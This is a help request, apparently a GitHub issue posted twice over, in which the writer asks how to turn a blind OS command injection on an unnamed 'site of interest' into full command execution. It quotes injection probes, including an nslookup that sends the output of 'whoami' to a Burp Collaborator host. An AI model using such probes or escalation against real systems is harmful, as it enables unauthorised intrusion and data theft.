Hello friend, I was reviewing your profile and I think you are the right person for the help I need.
A few days ago I found a vulnerability in a site of interest through burp suite scanner using nslookup xxx.burpcolaborator.com exploit with the following feature
Issue: OS command injection
Severity: High
Confidence: Certain
the vulnerability only responds when using ` and only responds to the nslookup, sleep and ping including the burp colaborator.
other commands like nslookup $(whoami).xxx.burp collaborator.com They do not give any answer, please I would appreciate it if you could help me with this problem since I cannot find a way to exploit this vulnerability and I want it to execute other commands apart from nslookup or sleep.
Hello friend, I was reviewing your profile and I think you are the right person for the help I need.
A few days ago I found a vulnerability in a site of interest through burp suite scanner using nslookup xxx.burpcolaborator.com exploit with the following feature
Issue: OS command injection Severity: High Confidence: Certain
the vulnerability only responds when using ` and only responds to the nslookup, sleep and ping including the burp colaborator.![1](https://github.com/carlospolop/hacktricks/assets/8999363/feed197e-452c-4f41-a805-fba3f876b05e)
These are the only commands it respond to.
nslookup xxx.burpcolaborator.com
ping xxx.burpcolaborator.com
sleep 10
other commands like
nslookup $(whoami).xxx.burp collaborator.com
They do not give any answer, please I would appreciate it if you could help me with this problem since I cannot find a way to exploit this vulnerability and I want it to execute other commands apart from nslookup or sleep.I await your response. Thanx